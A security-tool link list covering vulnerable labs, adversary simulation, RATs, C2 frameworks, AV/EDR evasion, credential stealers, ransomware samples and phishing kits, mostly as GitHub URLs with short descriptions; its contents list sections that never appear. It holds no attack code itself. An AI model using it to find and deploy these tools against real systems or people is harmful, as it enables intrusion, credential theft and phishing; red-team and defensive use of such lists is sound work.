Contents
- Useful Docker Images
- Misc Docker
- Misc Useful Stuff
- Threat Hunting & Simulation
- Adversary/Threat Simulation
- Cyber Ranges / Labs
- Payloads / RATS
- Stealthy Communication / Covert Channel
- Post Exploitation
- Social Engineering
- AIO Tools / Frameworks
- Hunting Guides / Forensics / MISC
- Blue Teams - Honeypots / IDS / Traps / CTR
- Web Security
- XSS Resources
- Cloud Security
- Office365 / AAD Security
- Online Tools
- API Stuff
- Password Lists
- Stress Test / Web Traffic Simulation / Test Automation

Useful Docker Images
- Vulnerable Apps
- https://github.com/citizen-stig/dockermutillidae
- https://hub.docker.com/r/opendns/security-ninjas/
- https://github.com/remotephone/dvwa-lamp
- https://hub.docker.com/r/ismisepaul/securityshepherd/
- https://hub.docker.com/r/danmx/docker-owasp-webgoat/
- https://github.com/bkimminich/juice-shop
- https://github.com/payatu/Tiredful-API
- jackhammer - One Security vulnerability assessment/management tool: https://github.com/olacabs/jackhammer/blob/master/docker-build.sh
- owtf - Offensive Web Testing Framework: https://github.com/owtf/owtf/tree/develop/docker
- docker-blackeye - container for running phishing attacks using Blackeye: https://github.com/vishnudxb/docker-blackeye
- h8mail - Powerful and user-friendly password finder: https://github.com/khast3x/h8mail/blob/master/Dockerfile
- Instantbox - a project that spins up temporary Linux systems with instant webshell access from any browser: https://github.com/instantbox/instantbox/blob/master/Dockerfile
- envizon - state of the art network visualization and vulnerability reporting tool: https://github.com/evait-security/envizon/tree/master/docker
- Cuckoo sandbox: https://hub.docker.com/r/blacktop/cuckoo/ | https://github.com/blacktop/docker-cuckoo
- Script to check Docker security (CIS benchmark): https://hub.docker.com/r/diogomonica/docker-bench-security/
- clair - static analysis of vulnerabilities in application containers: https://github.com/coreos/clair
- WebMap - A Web Dashboard for Nmap XML Reports: https://github.com/Rev3rseSecurity/WebMap/tree/v2.1/master/docker
- anchore - centralized service for inspection, analysis and certification of container images: https://github.com/anchore/anchore-engine
- https://hub.docker.com/r/ahannigan/docker-arachni/
- https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
- Portainer - Docker manager: http://portainer.io/install.html
- Connect to the local host with persistence: docker run -d -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock -v /path/on/host/data:/data portainer/portainer
- Kali Linux base + web tools installation: https://hub.docker.com/r/kalilinux/kali-linux-docker/
- apt-get -y install kali-linux-web && apt-get purge
- Malware sample downloader - https://hub.docker.com/r/remnux/maltrieve/
- Awesome docker repo: https://github.com/veggiemonk/awesome-docker
- OWASP Security Knowledge Framework: https://github.com/blabla1337/skf-flask
- Run it: docker run -ti -p 127.0.0.1:443:5443 blabla1337/skf-flask
- Haskell Dockerfile Linter - A smarter Dockerfile linter that helps you build best practice Docker images: https://github.com/hadolint/hadolint
- OWASP Security Shepherd: https://hub.docker.com/r/ismisepaul/securityshepherd/
docker run -i -p 80:80 -p 443:443 -t ismisepaul/securityshepherd /bin/bash
/usr/bin/mysqld_safe &
service tomcat7 start
If you don't have authbind installed and configured on your host machine (e.g. on Ubuntu), you'll need to do the following:
sudo apt-get install authbind
touch /etc/authbind/byport/80
touch /etc/authbind/byport/443
chmod 550 /etc/authbind/byport/80
chmod 550 /etc/authbind/byport/443
chown tomcat7 /etc/authbind/byport/80
chown tomcat7 /etc/authbind/byport/443
Misc Docker
Misc Useful Stuff
- Bypass application whitelisting: http://www.blackhillsinfosec.com/?p=5633
- Malicious Outlook rules: https://silentbreaksecurity.com/malicious-outlook-rules/
- Great cheatsheets: https://highon.coffee/blog/cheat-sheet/
- Headless Browsers: https://github.com/dhamaniasad/HeadlessBrowsers
- Linode Linux useful IP commands: https://www.linode.com/docs/networking/linux-static-ip-configuration
- netdata - system for distributed real-time performance and health monitoring: https://github.com/firehol/netdata
- yamot - Yet Another Monitoring Tool: https://github.com/knrdl/yamot
- NSIS (Nullsoft Scriptable Install System) is a professional open source system to create Windows installers: https://sourceforge.net/projects/nsis/
- awesome-pentest: https://github.com/enaqx/awesome-pentest
- Kubernetes Local Security Testing Lab - there are a number of playbooks which bring up clusters with a specific misconfiguration that can be exploited: https://github.com/raesene/kube_security_lab
- simulator - a distributed systems and infrastructure simulator for attacking and debugging Kubernetes: simulator creates a Kubernetes cluster for you in your AWS account; runs scenarios which misconfigure it and/or leave it vulnerable to compromise and trains you in mitigating against these vulnerabilities: https://github.com/kubernetes-simulator/simulator
- Splunk attack range: https://github.com/splunk/attack_range
- Red-Baron - a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams: https://github.com/Coalfire-Research/Red-Baron
- HazProne - a Cloud Pentesting Framework that emulates close-to-real-world scenarios by deploying vulnerable-by-demand AWS resources, enabling you to pentest the vulnerabilities within and, hence, gain a better understanding of what could go wrong and why. The framework helps you gain practical AWS penetration testing knowledge/skills: https://github.com/stafordtituss/HazProne
- CI/CDon't - This project will deploy intentionally vulnerable software/infrastructure to your AWS account: https://hackingthe.cloud/aws/capture_the_flag/cicdont/
- Datadog Security Labs Research - this repository aims at providing proof of concept exploits and technical demos to help the community respond to threats: https://github.com/DataDog/security-labs-pocs
- GitGoat - enables DevOps and Engineering teams to test security products intending to integrate with GitHub. GitGoat is a learning and training project that demonstrates common configuration errors that can potentially allow adversaries to introduce code to production: https://github.com/arnica-ext/GitGoat
- cloudgoat - Rhino Security Labs' "Vulnerable by Design" AWS deployment tool: https://github.com/RhinoSecurityLabs/cloudgoat
- CyberRange - this project provides a bootstrap framework for complete offensive, defensive, reverse engineering, & security intelligence tooling in a private research lab using the AWS Cloud: https://github.com/secdevops-cuse/CyberRange
- AWSGoat - A Damn Vulnerable AWS Infrastructure. AWSGoat is a vulnerable-by-design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigurations: https://github.com/ine-labs/AWSGoat
- AzureGoat - a vulnerable-by-design infrastructure on Azure featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigurations: https://github.com/ine-labs/AzureGoat
- GCPGoat - A Damn Vulnerable GCP Infrastructure: https://github.com/ine-labs/GCPGoat
- Supply Chain Goat - provides a training ground to practice implementing countermeasures specific to the software supply chain: https://github.com/step-security/supply-chain-goat
- oidc-ssrf - evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF: https://github.com/doyensec/oidc-ssrf
- PurpleCloud - Pentest Cyber Range for a small Active Directory Domain. Automated templates for building your own Pentest/Red Team/Cyber Range in the Azure cloud: https://github.com/iknowjason/PurpleCloud
- BadBlood - fills a Microsoft Active Directory Domain with a structure and thousands of objects: https://github.com/davidprowe/BadBlood
- Detection Lab - this lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations: https://github.com/clong/DetectionLab
- vulnerable-AD - creates a vulnerable Active Directory that allows you to test most Active Directory attacks in a local lab: https://github.com/WazeHell/vulnerable-AD
- ADLab - a tool created in PowerShell to quickly set up an Active Directory lab for testing purposes. This tool can help set up a Domain Controller and Workstation in a lab environment quickly and effectively: https://browninfosecguy.com/Active-Directory-Lab-Setup-Tool | https://github.com/browninfosecguy/ADLab
- Azure purple team lab by Black Hills InfoSec: https://www.blackhillsinfosec.com/how-to-applied-purple-teaming-lab-build-on-azure-with-terraform/ | https://github.com/DefensiveOrigins/APT-Lab-Terraform
- Redcloud - a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker: https://github.com/khast3x/Redcloud
- BlueCloud - Cyber Range deployment of HELK and Velociraptor! Automated terraform deployment of one system running HELK + Velociraptor server with one registered Windows endpoint in Azure or AWS: https://github.com/iknowjason/BlueCloud
- Damn Vulnerable Functions as a Service: https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
- kali-purple - the ultimate SOC in a box: https://gitlab.com/kalilinux/documentation/kali-purple
- AHHHZURE - an automated vulnerable Azure deployment script designed for offensive security practitioners and enthusiasts to brush up their cloud security skills: https://github.com/gladstomych/AHHHZURE
- Damn Vulnerable Restaurant API Game - An intentionally vulnerable API service designed for learning and training purposes dedicated to developers, ethical hackers and security engineers: https://github.com/theowni/Damn-Vulnerable-Restaurant-API-Game
- messypoutine - a GitHub organization demonstrating ⚠️ purposely vulnerable build pipelines: https://github.com/messypoutine/
- DVAPI - Damn Vulnerable API: https://github.com/payatu/DVAPI
- Uber metta: https://github.com/uber-common/metta
- SANS HELK Part 1: https://isc.sans.edu/forums/diary/Threat+Hunting+Adversary+Emulation+The+HELK+vs+APTSimulator+Part+1/23525/
- SANS HELK Part 2: https://isc.sans.edu/forums/diary/Threat+Hunting+Adversary+Emulation+The+HELK+vs+APTSimulator+Part+2/23529/
- CALDERA: https://github.com/mitre/caldera
- Infection Monkey: https://github.com/guardicore/monkey || https://www.guardicore.com/infectionmonkey/
- APTSimulator: https://github.com/NextronSystems/APTSimulator
- atomic-red-team: https://github.com/redcanaryco/atomic-red-team
- Red Team Automation (RTA): https://github.com/endgameinc/RTA
- Network Flight Simulator: https://github.com/alphasoc/flightsim
- Redhunt - Virtual Machine for Adversary Emulation and Threat Hunting: https://github.com/redhuntlabs/RedHunt-OS
- Blue Team Training Kit: https://www.bt3.no/
- UBoat - POC HTTP Botnet designed to replicate a full weaponised commercial botnet: https://github.com/Souhardya/UBoat
- Chain Reactor - an open source framework for composing executables that can simulate adversary behaviors and techniques on Linux endpoints: https://github.com/redcanaryco/chain-reactor
- Redcloud - a powerful and user-friendly toolbox for deploying a fully featured Red Team Infrastructure using Docker: https://github.com/khast3x/Redcloud
- Red Teaming/Adversary Simulation Toolkit - a collection of open source and commercial tools that aid in red team operations: https://github.com/infosecn1nja/Red-Teaming-Toolkit
- racketeer - Ransomware emulation toolkit: https://github.com/dsnezhkov/racketeer
- PurpleSharp - adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection engineering program. PurpleSharp leverages the MITRE ATT&CK Framework and executes different techniques across the attack life cycle: execution, persistence, privilege escalation, credential access, lateral movement, etc. It currently supports 47 unique ATT&CK techniques: https://github.com/mvelazc0/PurpleSharp
- pingcastle - a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework: https://github.com/vletoux/pingcastle
- Some red team automation (RTA) Python scripts that run on Windows, macOS, and *nix. RTA scripts emulate known attacker behaviors and are an easy way to verify that your rules are active and working as expected: https://github.com/elastic/detection-rules/tree/3e511965b49eae69d103b9210765bceee9cb6396/rta
- Teqnix - Penetration Testing Platform. Along with all the cool automation features, one of the benefits of TEQNIX is having access to a set of tools that do not require the user to install or maintain them. Furthermore, the library of tools is an asset to your testing methodologies, ready to be launched: https://teqnix.io/
- ATTPwn - a computer security tool designed to emulate adversaries. The tool aims to bring emulation of a real threat into closer contact with implementations based on the techniques and tactics from the MITRE ATT&CK framework: https://github.com/ElevenPaths/ATTPwn
- The Axer - Automatic msfvenom payload generator: https://github.com/ceh-tn/The-Axer
- pwnJS - JS payloads: https://github.com/theori-io/pwnjs
- SpookFlare: https://github.com/hlldz/SpookFlare
- Sharpshooter - payload creation framework for the retrieval and execution of arbitrary CSharp source code: https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/ || https://github.com/mdsecactivebreach/SharpShooter
- CACTUSTORCH - A JavaScript and VBScript shellcode launcher: https://github.com/mdsecactivebreach/CACTUSTORCH
- DotNetToJScript - A tool to generate a JScript which bootstraps an arbitrary .NET Assembly and class: https://github.com/tyranid/DotNetToJScript
- Fancy Bear - flatl1ne repo: https://github.com/FlatL1neAPT
- ShellPop - generate easy and sophisticated reverse or bind shell commands: https://github.com/0x00-0x00/ShellPop
- Vayne-Rat - C# RAT: https://github.com/TheM4hd1/Vayne-RaT
- avet - AntiVirus Evasion Tool: https://github.com/govolution/avet
- ph0neutria - malware zoo builder that sources samples straight from the wild: https://github.com/phage-nz/ph0neutria
- GreatSCT - tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions: https://github.com/GreatSCT/GreatSCT
- ASWCrypter - a Bash & Python script for generating payloads that bypass antivirus: https://github.com/AbedAlqaderSwedan1/ASWCrypter
- WePWNise - generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software: https://github.com/mwrlabs/wePWNise
- BYOB - is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets: https://github.com/malwaredllc/byob
- Androspy - Backdoor Crypter & Creator with Automatic IP Poisoner: https://github.com/TunisianEagles/Androspy
- Phantom-Evasion - an interactive antivirus evasion tool written in Python capable of generating (almost) FUD executables even with the most common 32-bit msfvenom payloads (lower detection ratio with 64-bit payloads): https://github.com/oddcod3/Phantom-Evasion
- Kage - designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads: https://github.com/WayzDev/Kage
- pypykatz_server - the server part of a server-agent model credential-acquiring tool (mimikatz) based on pypykatz: https://github.com/skelsec/pypykatz_server
- macro_pack - a tool used to automate obfuscation and generation of retro formats such as MS Office documents or VBS-like formats: https://github.com/sevagas/macro_pack
- Evil Clippy - a cross-platform assistant for creating malicious MS Office documents: https://github.com/outflanknl/EvilClippy
- pixload - Set of tools for creating/injecting payload into images: https://github.com/chinarulezzz/pixload
- Pown.js - a security testing and exploitation toolkit built on top of Node.js and NPM. Unlike traditional security tools like Metasploit, Pown.js considers frameworks to be an anti-pattern: https://github.com/pownjs/pown/blob/master/README.md
- nodeCrypto - a Linux ransomware written in Node.js that encrypts predefined files: https://github.com/atmoner/nodeCrypto
- MalwareBazaar - is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers: https://bazaar.abuse.ch/
- RapidPayload - Metasploit Payload Generator: https://github.com/AngelSecurityTeam/RapidPayload
- SGN - a polymorphic binary encoder for offensive security purposes such as generating statically undetectable binary payloads: https://github.com/EgeBalci/sgn/blob/master/README.md
- Arbitrium-RAT - a cross-platform remote access trojan (RAT), Fully UnDetectable (FUD); it allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding: https://github.com/BenChaliah/Arbitrium-RAT
- ScareCrow - a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls): https://github.com/optiv/ScareCrow
- SharpEDRChecker - catches hidden EDRs as well via its metadata checks, more info in a blog post coming soon: https://github.com/PwnDexter/SharpEDRChecker
- ratel - penetration test tool that allows you to take control of a windows machine: https://github.com/FrenchCisco/RATel
- OffensivePipeline - allows to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises: https://github.com/Aetsu/OffensivePipeline
- Limelighter - a tool which creates spoofed code-signing certificates and signs binaries and DLL files to help evade EDR products and avoid MSS and SOC scrutiny: https://github.com/Tylous/Limelighter
- Chimera - a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions: https://github.com/tokyoneon/Chimera
- Dent - a framework that generates code to exploit vulnerabilities in Microsoft Defender Advanced Threat Protection's Attack Surface Reduction (ASR) rules to execute shellcode without being detected or prevented: https://github.com/optiv/Dent
- onelinepy - Python Obfuscator for FUD Python Code: https://github.com/spicesouls/onelinepy
- MeterPwrShell - automated tool that generates a PowerShell one-liner that can create a Meterpreter shell on Metasploit and bypass AMSI, firewall, UAC and Windows Defender: https://github.com/GetRektBoy724/MeterPwrShell
- SigFlip - tool for patching Authenticode-signed PE files (exe, dll, sys, etc.) in a way that doesn't affect or break the existing Authenticode signature; in other words, you can change the PE file checksum/hash by embedding data (e.g. shellcode) without breaking the file signature, integrity checks or PE file functionality: https://github.com/med0x2e/SigFlip
- go-shellcode - a repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques: https://github.com/Ne0nd0g/go-shellcode
- PowerDNS: https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/ || https://github.com/mdsecactivebreach/PowerDNS
- Demiguise - generates .html files that contain an encrypted HTA file: https://github.com/nccgroup/demiguise
- EmbedInHTML - Embed and hide any file in HTML: https://github.com/Arno0x/EmbedInHTML
- DNSCAT2: https://github.com/iagox86/dnscat2
- DNS-Shell - an interactive Shell over DNS channel: https://github.com/sensepost/DNS-Shell
- SensePost Data Exfiltration Toolkit (DET): https://github.com/sensepost/DET
- Pyexfil: https://github.com/ytisf/PyExfil
- DoxyCannon: https://github.com/audibleblink/doxycannon
- Grok-backdoor: https://github.com/deepzec/Grok-backdoor
- foxtrot C2 - C&C to deliver content and shuttle command execution instructions: https://github.com/dsnezhkov/foxtrot
- Invisi-Shell - bypasses all of PowerShell's security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .NET assemblies: https://github.com/OmerYa/Invisi-Shell
- SILENTTRINITY: https://github.com/byt3bl33d3r/SILENTTRINITY
- PowerHub - A web application to transfer PowerShell modules, executables, snippets and files while bypassing AV and application whitelisting: https://github.com/AdrianVollmer/PowerHub
- FruityC2 - post-exploitation framework based on the deployment of agents on compromised machines: https://github.com/xtr4nge/FruityC2
- hershell - Simple TCP reverse shell written in Go: https://github.com/lesnuages/hershell
- Reverse Shell Cheat Sheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- Sliver - a general purpose cross-platform implant framework that supports C2 over mutual TLS, HTTP(S), and DNS: https://github.com/BishopFox/sliver/blob/master/README.md
- Slackor - A Golang implant that uses Slack as a command and control channel: https://github.com/Coalfire-Research/Slackor
- FudgeC2 - a campaign-oriented PowerShell C2 framework built on Python3/Flask, designed for team collaboration, client interaction, campaign timelining, and usage visibility: https://github.com/Ziconius/FudgeC2
- HRShell - an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities: https://github.com/chrispetrou/HRShell
- Ninja - C2 server created by Purple Team to do stealthy computer and Active Directory enumeration without being detected by SIEM and AVs: https://github.com/ahmedkhlief/Ninja
- faction framework - a C2 framework for security professionals, providing an easy way to extend and interact with agents. It focuses on providing an easy, stable, and approachable platform for C2 communications through well documented REST and Socket.IO APIs: https://www.factionc2.com/
- chisel - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH: https://github.com/jpillora/chisel
- udp2raw-tunnel - a tunnel which turns UDP traffic into encrypted FakeTCP/UDP/ICMP traffic using raw sockets; helps you bypass UDP firewalls (or unstable UDP environments): https://github.com/wangyu-/udp2raw-tunnel
- mubeng - an incredibly fast proxy checker & IP rotator: https://github.com/kitabisa/mubeng
- Interactsh - an open-source solution for out-of-band data extraction; a tool designed to detect bugs that cause external interactions, for example blind SQLi, blind CMDi, SSRF, etc.: https://github.com/projectdiscovery/interactsh
- reverse-ssh - a statically-linked SSH server with a reverse connection feature for simple yet powerful remote access: https://github.com/Fahrj/reverse-ssh
- ligolo-ng - a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS: https://github.com/tnpitsecurity/ligolo-ng
- Azure Outlook C2 - Azure Outlook Command & Control that uses Microsoft Graph API for C2 communications & data exfiltration: https://github.com/boku7/azureOutlookC2
- rconn - a multiplatform program for creating reverse connections. It lets you consume services that are behind NAT and/or firewall without adding firewall rules or port-forwarding: https://github.com/jafarlihi/rconn
- GoSH - Golang reverse/bind shell generator. This tool generates a Go binary that launches a shell of the desired type on the targeted host: https://github.com/redcode-labs/GoSH
- tornado - anonymous reverse shell over the onion network using hidden services without port forwarding: https://github.com/samet-g/tornado
- bore - a modern, simple TCP tunnel in Rust that exposes local ports to a remote server, bypassing standard NAT connection firewalls: https://github.com/ekzhang/bore
- Outline - lets anyone create, run, and share access to their own VPN. Outline is designed to be resistant to blocking: https://getoutline.org/
- RedGuard - provide a better C2 channel hiding solution for the red team, that provides the flow control for the C2 channel, blocks the "malicious" analysis traffic, and better completes the entire attack task: https://github.com/wikiZ/RedGuard
- RedWarden - was created to solve the problem of IR/AV/EDRs/Sandboxes evasion on the C2 redirector layer. It's intended to supersede classical Apache2 + mod_rewrite setups used for that purpose: https://github.com/mgeeky/RedWarden
- RedditC2 - Abusing Reddit API to host the C2 traffic: https://github.com/kleiton0x00/RedditC2
- PowerLurk - PowerShell toolset for building malicious WMI Event Subscriptions: https://github.com/Sw4mpf0x/PowerLurk
- Merlin - cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Go: https://github.com/Ne0nd0g/merlin
- phpsploit - a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server: https://github.com/nil0x42/phpsploit
- PE-Linux - Linux Privilege Escalation Tool: https://github.com/WazeHell/PE-Linux
- Bad-Pdf - create a malicious PDF to steal NTLM (NTLMv1/NTLMv2) hashes from Windows machines: https://github.com/deepzec/Bad-Pdf
- novahot - webshell framework for penetration testers: https://github.com/chrisallenlane/novahot
- Windows-Exploit-Suggester - this tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target: https://github.com/GDSSecurity/Windows-Exploit-Suggester
- LOLBAS - Living Off The Land Binaries And Scripts - https://github.com/LOLBAS-Project/LOLBAS | https://lolbas-project.github.io/#
- Koadic - COM Command & Control, a Windows post-exploitation rootkit. Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript): https://github.com/zerosum0x0/koadic
- 0xsp-Mongoose - Linux Privilege Escalation intelligent Enumeration Toolkit: https://github.com/lawrenceamer/0xsp-Mongoose
- wmigen - generate Batch, C, C++, C#, Delphi, F#, Java, JScript, KiXtart, Lua, Object Pascal, (Open) Object Rexx, Perl, PHP, PowerShell, Python, Ruby, Tcl, VB .NET or VBScript code for menu selected WMI queries: https://www.robvanderwoude.com/wmigen.php
- CryptonDie - a ransomware developed for study purposes: https://github.com/zer0dx/cryptondie
- CQTools - this toolkit allows delivering complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions and various keyloggers, and leveraging this information to deliver attacks: https://4f2bcn3u2m2u2z7ghc17a5jm-wpengine.netdna-ssl.com/wp-content/uploads/2019/03/cqtools-the-new-ultimate-hacking-toolkit-black-hat-asia-2019-2.7z | password: CQUREAcademy#123! | This whitepaper by Grzegorz Tworek describes CQTools usage: https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Januszkiewicz-CQTools-New-Ultimate-Hacking-Toolkit-wp.pdf
- PEASS - Privilege Escalation Awesome Scripts SUITE: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
- Flux-Keylogger - javascript keylogger with web panel: https://github.com/LimerBoy/Flux-Keylogger
- Adamantium-Thief - Get chromium browsers: passwords, credit cards, history, cookies, bookmarks: https://github.com/LimerBoy/Adamantium-Thief
- chromepass - a Python-based console application that generates a Windows executable that decrypts Chrome saved passwords and sends a file with the login/password combinations remotely: https://github.com/darkarp/chromepass/blob/master/README.md
- invoker - The goal is to use this tool when access to some Windows OS features through GUI is restricted: https://github.com/ivan-sincek/invoker
- Talon - a tool designed to perform automated password guessing attacks while remaining undetected. Great for user enumeration in a domain environment (LDAP/Kerberos): https://github.com/optiv/talon | Great blog post regarding the attack: https://www.optiv.com/explore-optiv-insights/blog/digging-your-talons-new-take-password-guessing
- ADE - ActiveDirectoryEnum: https://github.com/CasperGN/ActiveDirectoryEnumeration
- PYTMIPE - PYthon library for Token Manipulation and Impersonation for Privilege Escalation: https://github.com/quentinhardy/pytmipe
- Invoke-PSImage - Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute: https://github.com/peewpw/Invoke-PSImage
- Wynis - PowerShell scripts for auditing security against CIS best practices for Windows 10 and Windows Server 2016: https://github.com/Sneakysecdoggo/Wynis
- emp3r0r - Linux post-exploitation framework written in Go: https://github.com/jm33-m0/emp3r0r
- Vulmap - online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes: https://github.com/vulmon/Vulmap
- traitor - automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy: https://github.com/liamg/traitor
- pwncat - a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown from there. It streamlines common red team operations while staging code from your attacker machine, not the target: https://github.com/calebstewart/pwncat
- reverse-shell-generator - Hosted Reverse Shell generator with a ton of functionality: https://github.com/0dayCTF/reverse-shell-generator
- Go-RouterSocks - this tool will expose one socks port and route the traffic through the configured path: https://github.com/nodauf/Go-RouterSocks
- GodSpeed - a robust and intuitive manager for reverse shells: https://github.com/redcode-labs/GodSpeed
- SharpHound - C# Rewrite of the BloodHound Ingestor: https://github.com/BloodHoundAD/SharpHound3
- Max Bloodhound - Maximizing BloodHound with a simple suite of tools: https://github.com/knavesec/Max
- SNOWCRASH - polyglot payload generator. Creates a script that can be launched on both Linux and Windows machines: https://github.com/redcode-labs/SNOWCRASH
- PoisonApple - command-line tool to perform various persistence mechanism techniques on macOS: https://github.com/CyborgSecurity/PoisonApple
- DripLoader - Evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection: https://github.com/xinbailu/DripLoader
- r77 Rootkit - a ring 3 Rootkit that hides entities from all processes: https://github.com/bytecode77/r77-rootkit
- SharpHook - inspired by the SharpRDPThief project; it uses various API hooks in order to give us the desired credentials: https://github.com/IlanKalendarov/SharpHook
- PowerShdll - Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe and regsvr32.exe: https://github.com/p3nt4/PowerShdll/tree/master/dll
- PSAmsi - a tool for auditing and defeating AMSI signatures: https://github.com/cobbr/PSAmsi
- OffensivePipeline - allows you to download, compile (without Visual Studio) and obfuscate C# tools for Red Team exercises: https://github.com/Aetsu/OffensivePipeline
- MrKaplan - a tool aimed at helping red teamers stay hidden by clearing evidence of execution. It works by saving information such as the time it ran and a snapshot of files, and associates each piece of evidence with the related user: https://github.com/Idov31/MrKaplan
- Freeze - a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls: https://github.com/optiv/Freeze
- garble - produce a binary that works as well as a regular build, but that has as little information about the original source code as possible: https://github.com/burrowers/garble
- shennina - an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence: https://github.com/mazen160/shennina
- blackeye - Phishing Tool, with 32 templates: https://github.com/thelinuxchoice/blackeye
- Phishing-API: https://github.com/curtbraz/Phishing-API
- SocialFish: https://github.com/UndeadSec/SocialFish
- Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level: https://github.com/drk1wi/Modlishka
- The Social-Engineer Toolkit: https://github.com/trustedsec/social-engineer-toolkit
- HiddenEye - Modern Phishing Tool With Advanced Functionality: https://github.com/DarkSecDevelopers/HiddenEye
- o365-attack-toolkit - allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information: https://github.com/mdsecactivebreach/o365-attack-toolkit
- Phishing Simulation - mainly aims to increase phishing awareness by providing an intuitive tutorial and customized assessment: https://github.com/jenyraval/Phishing-Simulation
- ShellPhish - Phishing Tool for Instagram, Facebook, Twitter, Snapchat, Github, Yahoo and more: https://github.com/thelinuxchoice/shellphish
- zphisher - upgraded version (fork) of ShellPhish: https://github.com/htr-tech/zphisher
- nexphisher - Advanced phishing tool: https://github.com/htr-tech/nexphisher
- maskphish - a simple script to hide a phishing URL under a normal-looking URL (google.com or facebook.com): https://github.com/jaykali/maskphish
- Gophish - phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily set up and execute phishing engagements and security awareness training: https://github.com/gophish/gophish
- How to set up gophish to evade security controls: https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls
- The Ultimate Guide to Phishing - Learn how to Phish using EvilGinx2 and GoPhish: https://sidb.in/2021/08/03/Phishing-0-to-100.html
- SniperPhish - a phishing toolkit for pentesters or security professionals to enhance user awareness by simulating real-world phishing attacks. SniperPhish helps to combine both the phishing emails and the phishing websites you created to centrally track user actions: https://github.com/GemGeorge/SniperPhish
- phishmonger - Phishing platform designed for pentesters. This tool allows us to craft phishing emails in Outlook, clone them quickly, automatically template them for mass distribution, test email templates, schedule phishing campaigns, and track phishing results. Phishmonger is not just GoPhish in Node! You do not have to set up a separate mail server. Phishmonger itself is a mail server: https://github.com/fkasler/phishmonger
- awsssome_phish - phish aws sso code with dynamic url creation with lambda function: https://github.com/sebastian-mora/awsssome_phish
- O365-Doppelganger - a quick handy script to harvest credentials of a user during Red Teams: https://github.com/paranoidninja/O365-Doppelganger
- BITB - Browser templates for Browser In The Browser (BITB) attack: https://github.com/mrd0x/BITB
- phishsticks - a phishing framework for OAuth 2.0 device code authentication grant flow: https://github.com/dunderhay/phishsticks
- PowerSploit - A PowerShell Post-Exploitation Framework: https://github.com/PowerShellMafia/PowerSploit
- Empire: https://www.powershellempire.com/ (the original EmpireProject repository is archived; development continues in the BC-SECURITY fork at https://github.com/BC-SECURITY/Empire)
- Empire GUI (legacy, for the original EmpireProject release): https://github.com/EmpireProject/Empire-GUI
- Starkiller - Frontend for Powershell Empire. It is an Electron application written in VueJS: https://github.com/BC-SECURITY/Starkiller
- One-Lin3r - consists of various one-liners that aids in penetration testing operations: https://github.com/D4Vinci/One-Lin3r
- mad-metasploit - Metasploit custom modules, plugins, resource script: https://github.com/hahwul/mad-metasploit
- EasySploit - Metasploit automation: https://github.com/KALILINUXTRICKSYT/easysploit
- pwndrop - self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV: https://github.com/kgretzky/pwndrop
